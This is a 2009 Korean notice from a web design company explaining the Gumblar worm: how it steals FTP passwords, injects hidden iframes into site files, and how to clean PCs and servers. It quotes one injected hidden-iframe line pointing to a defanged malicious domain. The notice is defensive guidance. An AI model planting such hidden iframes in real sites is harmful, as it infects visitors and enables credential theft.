카테고리
6·25 전쟁일
  • 웹드로우 즐겨찾기 추가
  • 실시간 빠른상담
  • 빠르고 안정적인 카페24 호스팅
닫기
/ 1470 byte
개인정보수집 동의

공지사항

HOME > 공지사항

index 또는 main으로 시작하는 파일에 알 수 없는 아이프레임이 심어졌을 때

페이지 정보

작성일2009-09-17 14:46 조회4,019회

본문

어느 날 갑자기 멀쩡하던 홈페이지 레이아웃이 엉망으로 바뀌면서 관리자 페이지도 못들어가는 증상이 발생하여 index.php 소스를 내려받아 코드를 살펴보니 원래는 없던 코드가 아이프레임 방식으로 히든처리되어 심어져 있습니다.
코드는 <iframe src="./hxxxxxp://bestfindaloan.cn:8080/index.php" width=116 height=188 style="visibility: hidden"></iframe> 식입니다. 주소는 매우 다양합니다 (6월6일자 보고에 의하면 48,000개 도메인)  <= 바이러스 감염될 수 있으니 위 주소에 접속은 하지 마세요.
 
1. 바이러스 명 : 신종 지능형 웜바이러스 Gumblar (일명 제노바이러스) 2009년3월에 처음 발견되어 급속히 번지고 있으며 현존하는 바이러스중 가장 악질적인 바이러스 (ZDnet)
공격유형이 최근 최악의 웜바이러스로 불리는 Conficker 바이러스보다 치명적 Google의 검색결과를 조작시켜 악성코드를 내포한 사이트로 유도하는 기능도 있슴. 익스플로러 브라우저 자체에 악성코드를 주입시켜 웹트래픽유발
2. 감염경로
가. 퍼스널컴퓨터 1차 감염
위 바이러스에 감염된 사이트에 접속하면 바이러스를 만든 공격자의 홈페이지(아이프레임에 심어진 사이트 : 최초에는 gumblar.cn 이었는데 지금은 수만개의 숙주사이트-합법적이고 정상적인 사이트임-가 존재)로 리다이렉트되고 방문자의 퍼스널컴퓨터로 감염된 PDF파일을 내려받게 한다. 감염된 PDF파일는 아크로뱃리더 또는 플래시플레이어의 취약점을 이용하여 방문자의 퍼스널컴퓨터에 대한 접근권한을 취득한다. 그 후 바이러스는 FTP 클라이언트(파일질라,드림위버,나모,CuteFTP,WsFtp,알FTP 등)의 패스워드를 빼내 공격자의 호스트로 보내고 때로는 윈도우프롬프트, 레지스트리에디터, 안티바이러스프로그램을 무력하게 만든다.

나. 서버 2차 감염
공격자의 호스트사이트는 퍼스널컴퓨터에서 획득한 패스워드를 이용하여 FTP를 통해 멋이감 웹사이트에 접속해서 다량의 파일을 내려받아 악성코드를 주입하고 다시 업로드시킨다. 그코드는 HTML,PHP,JavaScript,ASP,ASPx 등 body 태그가 포함된 파일에 삽입된다. 삽입된 악성코드는 그 코드를 실행하는 컴퓨터(방문자의 퍼스널컴퓨터)를 감염시키도록 자바스크립트를 포함하고 있다. 여기에 더하여 몇몇 파일(위에서 언급한 index,main,home,default) 에는 아이프레임을 삽입시킨다. 바이러스는 또한 .htacess 및 HOSTS 파일을 변조시키며 images 폴더에 images.php 파일을 생성시킨다. 감염은 서버전체로 퍼지는 것은 아니고 패스워드가 탈취된 사이트에서만 일어난다.

위 가항과 나항의 모든 과정은 프로그램에 의해 자동 진행된다.
 
3. 감지 및 처방
가. 퍼스널컴퓨터
바이러스 감염의 시작점이기때문에 퍼스널컴퓨터부터 손봐야 합니다. 먼저 안티스파이웨어 Tool로 스캔을 합니다. 알약이나 Kaspersky으로는 검출이 안됩니다. 검출 가능한 툴은 Malewarebytes(무료버전) 이나 HijackThis 입니다. 저는 Malewarebytes로 돌려보니 알약으로는 깨끗했던 사무실 컴퓨터가 24개의 Trojan.BHO, Trojan.Games Thief, Trojan Backboor 등 다양하게 점령당했더군요. 일단 치료후 컴퓨터가 깨끗해진 것이 확인되면 반드시 FTP 패스워드를 변경하고 재감염을 막기 위해서는 접속편의를 위해  FTP 클라이언트에 패스워드를 저장해놓고 쓰는 방식은 하지 말아야 합니다. 번거롭더라도 그때 그때 패스워드를 입력해서 접속하세요.
 
나. 서버
서버는 완벽히 깨끗이 정리되어야 합니다. 단 한개의 감염된 파일이 남아 있어도 재감염됩니다. 가장 권장하는 방법은 깨끗한 백업본이 있다면 서버에 있는 파일을 싹 지우고 백업본으로 대체하는 것이고, 아니면 서버에 있는 파일을 내려받아 안티바이러스 프로그램으로 치료후에 재업로드 하는 것입니다.  아이프레임으로 심어진 악성 코드는 수작업으로 리무브시켜야합니다.
 
궁금하신 사항은 별도로 문의바랍니다.
  • 페이스북으로 보내기
  • 트위터로 보내기
  • 구글플러스로 보내기
  • 구글 블로그로 보내기
  • 텀블러로 내보내기

공지사항 목록

게시물 검색
닫기
개인정보를 수집하는 항목
웹드로우(이하 '회사')는 별도의 회원가입 절차 없이 대부분의 컨텐츠에 자유롭게 접근할 수 있습니다. 회사는 홈페이지 제작 상담을 위하여 아래와 같은 신청페이지에서 개인정보를 수집하고 있습니다.
- 질문답변, 견적의뢰, 빠른상담, 상품구입
1) 고객상담시 수집하는 개인정보의 범위
  1. 질문답변 필수 입력: 이름, 비밀번호, 연락처, 제목, 내용, 자동등록방지
  2. 질문답변 선택 입력: 이메일, 홈페이지, FTP 아이디/패스, 관리자 아이디/패스
  3. 견적의뢰 필수 입력: 이름, 비밀번호, 연락처, 페이지수, 예산규모, 홈페이지유형, 내용. 자동등록방지
  4. 견적의뢰 선택 입력: 이메일, 회사명, 팩스번호, 오픈예정일, 견적서확인, 참조홈페이지
2) 개인정보의 수집목적 및 이용목적
① 회사은 고객님께 최대한으로 최적화되고 맞춤화된 서비스를 제공하기 위하여 다음과 같은 목적으로 개인정보를 수집하고 있습니다.
  1. 이름, 연락처은 고객상담의 기본 필수 요소입니다.
  2. 이메일, 연락처 : 고지사항 전달, 본인 의사 확인, 불만 처리 등 원활한 의사소통 경로의 확보, 새로운 서비스의 안내
  3. 그 외 선택항목 : 개인맞춤 서비스를 제공하기 위한 자료
② 단, 이용자의 기본적 인권 침해의 우려가 있는 민감한 개인정보(인종 및 민족, 사상 및 신조, 출신지 및 본적지, 정치적 성향 및 범죄기록, 건강상태 및 성생활 등)는 수집하지 않습니다.
3) 개인정보의 보유기간 및 이용기간
① 귀하의 개인정보는 다음과 같이 개인정보의 수집목적 또는 제공받은 목적이 달성되면 파기됩니다. 단, 관련법령의 규정에 의하여 다음과 같이 권리 의무 관계의 확인 등을 이유로 일정기간 보유하여야 할 필요가 있을 경우에는 일정기간 보유합니다.
  1. 계약 또는 청약철회 등에 관한 기록 : 5년
  2. 대금결제 및 재화등의 공급에 관한 기록 : 5년
  3. 소비자의 불만 또는 분쟁처리에 관한 기록 : 3년
② 귀하의 동의를 받아 보유하고 있는 거래정보 등을 귀하께서 열람을 요구하는 경우 은 지체없이 그 열람,확인 할 수 있도록 조치합니다.
4) 개인정보 파기절차 및 방법
이용자의 개인정보는 원칙적으로 개인정보의 수집 및 이용목적이 달성되면 지체 없이 파기합니다.
회사의 개인정보 파기절차 및 방법은 다음과 같습니다.
  1. 개인정보는 법률에 의한 경우가 아니고서는 보유되는 이외의 다른 목적으로 이용되지 않습니다.
  2. 종이에 출력된 개인정보는 분쇄기로 분쇄하거나 소각을 통하여 파기합니다.
  3. 전자적 파일 형태로 저장된 개인정보는 기록을 재생할 수 없는 기술적 방법을 사용하여 삭제합니다.